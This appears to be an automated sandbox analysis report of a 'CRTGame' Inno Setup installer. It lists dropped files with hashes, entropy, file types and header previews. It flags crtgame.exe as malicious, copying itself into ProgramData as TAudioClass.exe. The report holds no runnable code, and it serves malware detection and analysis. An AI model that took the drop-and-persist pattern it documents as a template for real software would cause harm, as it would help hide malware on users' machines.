Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).........R...................................................+....@... ......................0.......@.......p......................................................4S......................tA..$............................text...............................`..`.data...............................@....rdata...o.......p..................@..@/4......d`...`...b...D..............@..@.bss.....P...............................edata.......0......................@..@.idata.......@......................@....CRT....,....P......................@....tls.........`......................@....rsrc........p......................@..@.reloc..............................@..B........................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\tak_deco_lib.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	112640
Entropy (8bit):	6.540227486061059
Encrypted:	false
SSDEEP:	1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
MD5:	BDB65DCE335AC29ECCBC2CA7A7AD36B7
SHA1:	CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
SHA-256:	7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
SHA-512:	8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
Malicious:	false
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\takdec.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	772608
Entropy (8bit):	6.546391052615969
Encrypted:	false
SSDEEP:	6144:Q75mFL0MNnM/SQdtij4UujFhGiNV1SckT3wio2L2jV6EfnQ29mwF3s4iGtInw1m8:AwN0e0lN1fnQUFccGns9ukS6
MD5:	B3B487FC3832B607A853211E8AC42CAD
SHA1:	06E32C28103D33DAD53BE06C894203F8808D38C1
SHA-256:	30BC10BD6E5B2DB1ACE93C2004E24C128D20C242063D4F0889FD3FB3E284A9E4
SHA-512:	FA6BDBA4F2A0CF4CCA40A333B69FD041D9EDC0736EDA206F17F10AF5505CC4688B0401A3CAD2D2F69392E752B8877DB593C7872BCDB133DC785A200FF38598BB
Malicious:	false
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....1.d.................D..........$].......`....@.......................................@......@...................0..o............p...(...................`...............................P......................X........ .......................text...h4.......6.................. ..`.itext.......P.......:.............. ..`.data....7...`...8...H..............@....bss....0i...............................idata..............................@....didata...... ......................@....edata..o....0......................@..@.tls.........@...........................rdata..]....P......................@..@.reloc.......`......................@..B.rsrc....(...p...(..................@..@....................................@..@................

C:\Program Files (x86)\CRTGame\bin\x86\uchardet.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	294926
Entropy (8bit):	6.191604766067493
Encrypted:	false
SSDEEP:	3072:7E0FFjiAeF21pLQFgK33duKMnlCj3eWyNg2hlNvFXl8rzJjjOjVmdX566Uwqwqwm:wKFX3LygKjjN2HIfpruwqwqwFUgVE
MD5:	C76C9AE552E4CE69E3EB9EC380BC0A42
SHA1:	EFFEC2973C3D678441AF76CFAA55E781271BD1FB
SHA-256:	574595B5FD6223E4A004FA85CBB3588C18CC6B83BF3140D8F94C83D11DBCA7BD
SHA-512:	7FB385227E802A0C77749978831245235CD1343B95D97E610D20FB0454241C465387BCCB937A2EE8A2E0B461DD3D2834F7F542E7739D8E428E146F378A24EE97
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.........\|.....................n.................................c........ ......................`..j7...........................................................................................................................text...8...........................`.P`.data...x...........................@.0..rdata...F.......H..................@.`@/4.......U.......V..................@.0@.bss.........P........................`..edata..j7...`...8...$..............@.0@.idata...............\..............@.0..CRT....,............b..............@.0..tls.................d..............@.0..reloc...............f..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\utils.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	13838
Entropy (8bit):	5.173769974589746
Encrypted:	false
SSDEEP:	192:oh3ZZBe9xz7rdz9Us5bsRuKUYDpesWAhQqCNhNXUwS7RuLH9+E:ohLBe3dz9UsikKDGZqCNhNXUwS4bcE
MD5:	9C55B3E5ED1365E82AE9D5DA3EAEC9F2
SHA1:	BB3D30805A84C6F0803BE549C070F21C735E10A9
SHA-256:	D2E374DF7122C0676B4618AED537DFC8A7B5714B75D362BFBE85B38F47E3D4A4
SHA-512:	EEFE8793309FDC801B1649661B0C17C38406A9DAA1E12959CD20344975747D470D6D9C8BE51A46279A42FE1843C254C432938981D108F4899B93CDD744B5D968
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........6.........#.........2...............0....@m.................................Z........ ......................p..J.......h............................................................@......................................................text...............................`.P`.data...,....0......................@.0..rdata.......@......................@.0@/4...........P......................@.0@.bss.........`........................`..edata..J....p.......(..............@.0@.idata..h............*..............@.0..CRT....,............0..............@.0..tls.................2..............@.0..reloc...............4..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\wavpackdll.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	258560
Entropy (8bit):	6.491223412910377
Encrypted:	false
SSDEEP:	6144:X+FRYMGwNozw5upAagZnb80OXrGSc+w9nI7ZMcyVhk233M:SGMGbw5upAagZb80SMXzkgM
MD5:	DB191B89F4D015B1B9AEE99AC78A7E65
SHA1:	8DAC370768E7480481300DD5EBF8BA9CE36E11E3
SHA-256:	38A75F86DB58EB8D2A7C0213861860A64833C78F59EFF19141FFD6C3B6E28835
SHA-512:	A27E26962B43BA84A5A82238556D06672DCF17931F866D24E6E8DCE88F7B30E80BA38B071943B407A7F150A57CF1DA13D2137C235B902405BEDBE229B6D03784
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.j..f...f...f..]....f..]...f..]....f......f......f......f......f..]....f...f..]f......f......f......f...f...f......f..Rich.f..........PE..L...y.._...........!................@........ ...............................@..........................................d...$...(.......h.................... ......................................(...@............ ..8............................text...q........................... ..`asmcode.>$.......&.................. ..`.rdata..B.... ......................@..@.data...............................@....rsrc...h...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\crtgame.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	2195454
Entropy (8bit):	6.3391537227636
Encrypted:	false
SSDEEP:	24576:t70DabqUrOqdUU0FHR7F6RqubHsDoi1zTVYc60ra89K/UQOh/dYzIpnHq9jFHs0n:t70DBUrBUUS7ERqLXuHpAir
MD5:	A158C99AA92F0E29ED84BB25976D4F7A
SHA1:	165831B30EC9EA08FA80E348AE1A522256A633BD
SHA-256:	D038C11B0567EE81823A93BD8A1CC62F176AC7CE785104E7B08954B1B3D80FA4
SHA-512:	DCCF5785BA72C46CD38766610341CCC1DF2CB4C98F2C475105B06CEAE461BD109974D3B9D8DE945619B7ACFA88A85082C6EF239D7E074511B411A3706521A170
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... .ve.................0...................@....@...........................!......."......................................I..P........G...........................................................................@...............................text....+.......0.................. ..`.rdata.......@... ...@..............@..@.data....P...`...0...`..............@....rsrc....G.......P..................@..@.hsave..............................`...........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\is-LEIKG.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	data
Category:	dropped
Size (bytes):	2195454
Entropy (8bit):	6.339153278561764
Encrypted:	false
SSDEEP:	24576:q70DabqUrOqdUU0FHR7F6RqubHsDoi1zTVYc60ra89K/UQOh/dYzIpnHq9jFHs0n:q70DBUrBUUS7ERqLXuHpAir
MD5:	4B956643F5C9B747DE0532B77F432530
SHA1:	2D74244D4F107463A2A500531C4C2136AB447192
SHA-256:	A9DCC552D890C4CCB978BCE7D0BBA244E3460CA7FA26F863E02166F15AFDE2E8
SHA-512:	DD4BDC208062BE8BC67D7E9448AFBA98D03706C76A3138E5E991A1CF734BBAFCB5AE7B6ADA54FD05FDB5E2112642C5C4E70D5A4C7208E31438A476098FB05D08
Malicious:	false
Preview:	.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... .ve.................0...................@....@...........................!......."......................................I..P........G...........................................................................@...............................text....+.......0.................. ..`.rdata.......@... ...@..............@..@.data....P...`...0...`..............@....rsrc....G.......P..................@..@.hsave..............................`...........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\stuff\date.txt (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	IFF data
Category:	dropped
Size (bytes):	1716
Entropy (8bit):	4.781797138644031
Encrypted:	false
SSDEEP:	24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
MD5:	257D1BF38FA7859FFC3717EF36577C04
SHA1:	A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
SHA-256:	DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
SHA-512:	E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
Malicious:	false
Preview:	FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith

C:\Program Files (x86)\CRTGame\stuff\is-9NUJV.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	IFF data
Category:	dropped
Size (bytes):	1716
Entropy (8bit):	4.781797138644031
Encrypted:	false
SSDEEP:	24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
MD5:	257D1BF38FA7859FFC3717EF36577C04
SHA1:	A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
SHA-256:	DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
SHA-512:	E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
Malicious:	false
Preview:	FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith

C:\Program Files (x86)\CRTGame\stuff\is-ANHTR.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1825
Entropy (8bit):	5.088030483893024
Encrypted:	false
SSDEEP:	24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
MD5:	992C00BEAB194CE392117BB419F53051
SHA1:	8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
SHA-256:	9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
SHA-512:	FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
Malicious:	false
Preview:	.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<

C:\Program Files (x86)\CRTGame\stuff\is-GKO5R.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1825
Entropy (8bit):	5.088030483893024
Encrypted:	false
SSDEEP:	24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
MD5:	992C00BEAB194CE392117BB419F53051
SHA1:	8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
SHA-256:	9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
SHA-512:	FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
Malicious:	false
Preview:	.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<

C:\Program Files (x86)\CRTGame\stuff\is-KUSEM.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	IFF data
Category:	dropped
Size (bytes):	1716
Entropy (8bit):	4.781797138644031
Encrypted:	false
SSDEEP:	24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
MD5:	257D1BF38FA7859FFC3717EF36577C04
SHA1:	A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
SHA-256:	DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
SHA-512:	E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
Malicious:	false
Preview:	FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith

C:\Program Files (x86)\CRTGame\stuff\tagsreplace.txt (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1825
Entropy (8bit):	5.088030483893024
Encrypted:	false
SSDEEP:	24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
MD5:	992C00BEAB194CE392117BB419F53051
SHA1:	8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
SHA-256:	9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
SHA-512:	FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
Malicious:	false
Preview:	.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<

C:\Program Files (x86)\CRTGame\uninstall\is-3QRHG.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	714526
Entropy (8bit):	6.5053900039496435
Encrypted:	false
SSDEEP:	12288:fRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExycy:5ObekrkfohrP337uzHnA6cHiiHEVVg6i
MD5:	3910EA485B6F67ECAF6B34DDB4BE5980
SHA1:	85C397003697A6DCDBCAD43B2C7F8336BE99CA5F
SHA-256:	FD2C46551A5A55A0C2B5A12AE2385BE68681AE8E8DFA1E0C3AD686057795CC45
SHA-512:	65977C0A6E1E21D056080CCC733C303880141AF0E585275041274D6D41742FDCEDE4B3369D56A0D0C4B2A5F3AC734E48234110B8D81C43ADA5CBC10619B0DB45
Malicious:	false
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................

C:\Program Files (x86)\CRTGame\uninstall\unins000.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	InnoSetup Log CRTGame, version 0x30, 8023 bytes, 642294\user, "C:\Program Files (x86)\CRTGame"
Category:	dropped
Size (bytes):	8023
Entropy (8bit):	5.054704847701417
Encrypted:	false
SSDEEP:	96:b3N8WVPpvzbK+T4hlOIhlXWx4cVSQs0Ln92E2VYW4n:b98WVPpvd+QIhs+cVSQ1nIm1
MD5:	631F3663EE1CE52135FE19534A59CE8A
SHA1:	9D2CCFFAC8769A1F273841A7BE3C40D749033D97
SHA-256:	C10A603A9AFE2CC8A10B1A07C7DC659D0EB45B05F91B143943D4B7FCDFA066E5
SHA-512:	4E39D4378CE040CD5B694FAC554780D37A25074405C8C819260A835EFDC7850DE2911BB165F6807B890F8A1F46F2C725B4EFC84E9046A15C800E867FC179EC78
Malicious:	false
Preview:	Inno Setup Uninstall Log (b)....................................CRTGame.........................................................................................................................CRTGame.........................................................................................................................0...G...W...%.................................................................................................................)=...........N......A....642294.user.C:\Program Files (x86)\CRTGame...............(.. ..........h.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...............................o...........!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.dll.GetSystemM

C:\Program Files (x86)\CRTGame\uninstall\unins000.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	714526
Entropy (8bit):	6.5053900039496435
Encrypted:	false
SSDEEP:	12288:fRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExycy:5ObekrkfohrP337uzHnA6cHiiHEVVg6i
MD5:	3910EA485B6F67ECAF6B34DDB4BE5980
SHA1:	85C397003697A6DCDBCAD43B2C7F8336BE99CA5F
SHA-256:	FD2C46551A5A55A0C2B5A12AE2385BE68681AE8E8DFA1E0C3AD686057795CC45
SHA-512:	65977C0A6E1E21D056080CCC733C303880141AF0E585275041274D6D41742FDCEDE4B3369D56A0D0C4B2A5F3AC734E48234110B8D81C43ADA5CBC10619B0DB45
Malicious:	false
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................d..........lp............@..............................................@...............................%..................................................................................................................CODE.....b.......d.................. ..`DATA.................h..............@...BSS..................z...................idata...%.......&...z..............@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................H..............@..P........................................................................................................................................

C:\ProgramData\TAudioClass\TAudioClass.exe

Download File

Process:	C:\Program Files (x86)\CRTGame\crtgame.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2195454
Entropy (8bit):	6.3391537227636
Encrypted:	false
SSDEEP:	24576:t70DabqUrOqdUU0FHR7F6RqubHsDoi1zTVYc60ra89K/UQOh/dYzIpnHq9jFHs0n:t70DBUrBUUS7ERqLXuHpAir
MD5:	A158C99AA92F0E29ED84BB25976D4F7A
SHA1:	165831B30EC9EA08FA80E348AE1A522256A633BD
SHA-256:	D038C11B0567EE81823A93BD8A1CC62F176AC7CE785104E7B08954B1B3D80FA4
SHA-512:	DCCF5785BA72C46CD38766610341CCC1DF2CB4C98F2C475105B06CEAE461BD109974D3B9D8DE945619B7ACFA88A85082C6EF239D7E074511B411A3706521A170
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... .ve.................0...................@....@...........................!......."......................................I..P........G...........................................................................@...............................text....+.......0.................. ..`.rdata.......@... ...@..............@..@.data....P...`...0...`..............@....rsrc....G.......P..................@..@.hsave..............................`...........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\rc.dat

Download File

Process:	C:\Program Files (x86)\CRTGame\crtgame.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:1ln:v
MD5:	34F45818F16D1BBB62BA5874B8814CC7
SHA1:	A454CA483B4A66B83826D061BE2859DD79FF0D6C
SHA-256:	DC765660B06EE03DD16FD7CA5B957E8C805161AC2C4AF28C5A100AB2AB432CA1
SHA-512:	65711C8D556639DDFC14CE292B2415F3A2824D003AF1A530093B8E0B70B695E6C639694B7B90C6750B1129566D9A3784ED274667988D4B227DB2AC9B6CF7548B
Malicious:	false
Preview:	....

C:\ProgramData\resource.dat

Download File

Process:	C:\Program Files (x86)\CRTGame\crtgame.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	128
Entropy (8bit):	2.862976125752538
Encrypted:	false
SSDEEP:	3:1k/QnTzXD9iIgAnDTa3pkHil/:11TzXD9iIxPa3pkHit
MD5:	785BB7F0B0CEF59C39B9F5E21CD2FD04
SHA1:	1E1FFDEE1584A00BDE18BD7BD19C02988301C250
SHA-256:	90B35EC0C6B41ACEC2C9BB51CDDCB6339FB035C222766A4CA4CBB15B7A7D8853
SHA-512:	6D2449E111F7F059734960B83B0B090A7239EE2D93EB70F839ECDDAA640658B90667F123CFB4FE8E0F5DC0A854A47B62AA2FCAF971D08B9118CAC840DBF999EB
Malicious:	false
Preview:	3e0f25005939fee32fa196d33e7a2b8f6ce30e1128f6a30e537a9ba072d59a73................................................................

C:\ProgramData\ts.dat

Download File

Process:	C:\Program Files (x86)\CRTGame\crtgame.exe
File Type:	ISO-8859 text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:n/ll:/ll
MD5:	B559B435D0EDF7251ADEFC17A9A94AAF
SHA1:	ADFEB0621A7F78F49EBE625EA3AA4DCC050D57C3
SHA-256:	119DDD8C3A45574B16FECFE80B20B975F48833EC5A38E04B8C58EF61C036A9B8
SHA-512:	5AFE6B17F32A38A57BD93EF6AAC379240B0512E6A1CBEA95C5FB3C8483448067B684C2AB2DB6BBD5C18EBF50D8E32FA330D036F31FF931D044F89CA713D1987B
Malicious:	false
Preview:	.x]g....

C:\Users\user\AppData\Local\Temp\is-DSQM4.tmp\_isetup\_RegDLL.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.026670007889822
Encrypted:	false
SSDEEP:	48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
MD5:	0EE914C6F0BB93996C75941E1AD629C6
SHA1:	12E2CB05506EE3E82046C41510F39A258A5E5549
SHA-256:	4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
SHA-512:	A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................\|.......\|.......\|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-DSQM4.tmp\_isetup\_iscrypt.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2560
Entropy (8bit):	2.8818118453929262
Encrypted:	false
SSDEEP:	24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
MD5:	A69559718AB506675E907FE49DEB71E9
SHA1:	BC8F404FFDB1960B50C12FF9413C893B56F2E36F
